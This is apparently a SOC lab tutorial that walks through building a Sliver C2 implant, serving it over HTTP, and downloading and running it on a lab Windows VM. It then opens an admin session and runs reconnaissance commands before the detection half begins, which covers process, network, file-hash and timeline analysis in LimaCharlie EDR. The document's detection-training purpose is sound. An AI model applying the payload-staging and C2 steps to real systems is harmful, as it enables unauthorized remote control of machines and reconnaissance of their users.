Part 2 - Detecting C2 Activity

A hands-on SOC lab for detecting and analyzing C2 activity using Sliver and LimaCharlie, covering payload execution, process monitoring, and network forensics

Generating and Deploying a C2 Payload

In this guide, we will generate a C2 payload using Sliver and deploy it to a Windows VM for further testing.

1️⃣ Start an SSH Session

First, connect to your Ubuntu VM:

ssh user@[Linux_VM_IP]

Once connected, switch to the root user and navigate to the Sliver directory:

sudo su
cd /opt/sliver

2️⃣ Launch the Sliver Server

Run the following command to start Sliver:

sliver-server

3️⃣ Generate the Payload

Within the Sliver shell, generate the C2 payload using your Linux VM’s IP:

generate --http [Linux_VM_IP] --save /opt/sliver

Sliver C2 to create a payload for command-and-control (C2) operations. Take note of the randomly generated payload filename, as you will need it later.

4️⃣ Verify the Payload

To confirm the payload was successfully created, run:

implants

Now, exit the Sliver shell:

exit

5️⃣ Transfer the Payload to Windows VM

To easily download the payload onto the Windows VM, we will use Python to start a temporary web server:

cd /opt/sliver
python3 -m http.server 80

Switch to the Windows VM, open Administrative PowerShell and download the payload by running:

IWR -Uri http://[Linux_VM_IP]/[payload_name].exe -Outfile C:\Users\User\Downloads\[payload_name].exe

(Replace [Linux_VM_IP] and [payload_name] with the actual values.)

6️⃣ Take a VM Snapshot

Before executing the payload, create a snapshot of your Windows VM for safety.

📌 Snapshot Name: Malware staged

Starting Command and Control (C2) Session

Now that the payload is on the Windows VM, we must switch back to the Linux VM SSH session and enable the Sliver HTTP server to catch the callback.

1️⃣ Stop the Python Web Server

Terminate the temporary web server we started earlier by pressing:

Ctrl + C

2️⃣ Relaunch Sliver

Start the Sliver C2 framework again:

sliver-server

3️⃣ Start the HTTP Listener

Within the Sliver shell, start an HTTP listener:

http

If you get an error starting the HTTP listener, try rebooting the Linux VM and retrying.

4️⃣ Execute the C2 Payload on Windows

On the Windows VM, open an Administrative PowerShell prompt and run the C2 payload from its download location:

C:\Users\pc1\Downloads\ALIVE_CONVECTION.exe

(Ensure you are running this from an Administrator command prompt.)

Within a few moments, your session should check in on the Sliver server.

5️⃣ Verify Active Sessions in Sliver

Back on the Linux VM, list active sessions:

sessions

Take note of the Session ID.

6️⃣ Interact with the C2 Session

To control the compromised system, use the session:

use [session_id]

(Replace [session_id] with your actual session ID.)

7️⃣ Gather System Information

Now that we have access, let's run some basic reconnaissance commands.

Get Session Info

info

Identify the User and Privileges

whoami
getprivs

If you see SeDebugPrivilege, you have administrative rights.

Identify the Current Directory

pwd

Examine Network Connections

netstat

• Sliver highlights its own process in green.

• rphcp.exe is the LimaCharlie EDR service executable

List Running Processes

ps 

• Sliver highlights its own process in green

• And any defensive tools in red.

  
• This is how attackers become aware of what security products a victim system may be using.

Observing EDR Telemetry in LimaCharlie

Exploring LimaCharlie Web UI

Step 1: Accessing Sensors

1. Navigate to the LimaCharlie web UI.

2. Click on "Sensors" in the left-side menu.

3. Select your active Windows sensor.

Step 2: Process Monitoring

1. In the left-side menu for this sensor, click on "Processes."

   
2. Explore the returned process tree.

3. Hover over process icons to understand their representations.

4. Familiarize yourself with common system processes.

5. Reference resources like the "Hunt Evil" poster from SANS and EchoTrail.

Identifying Suspicious Processes

• Signed processes are typically benign but can be abused (LOLBINs).

  
• Unusual, unsigned processes can be potential threats.

  
• Look for processes with active network connections.

  • Notice how quickly we are able to identify the destination IP this process is communicating with.

  

Step 3: Network Monitoring

1. Click the "Network" tab in the left-side menu.

   
2. Examine active network connections.

3. Use Ctrl+F to search for your implant name or C2 IP address.

Step 4: File System Analysis

1. Click the "File System" tab in the left-side menu.

2. Browse to the implant's running directory (e.g., C:\Users\pc1\Downloads).

   
3. Check the hash of the suspicious executable.

4. Scan the hash with VirusTotal.

   

Tip: VirusTotal checks only known file hashes. If a file isn't found, it may be newly created—treat it as suspicious.

Step 5: Timeline Analysis

1. Click the "Timeline" tab in the left-side menu.

2. View near real-time telemetry and event logs.

   
3. Filter the timeline using known IOCs (implant name, C2 IP, etc.).

4. Identify:

   • The moment the implant was created.

   • Its launch time.

   • The network connections it established.

     
5. Check events related to your implant, like "SENSITIVE_PROCESS_ACCESS" from privilege enumeration—useful for detection rules later.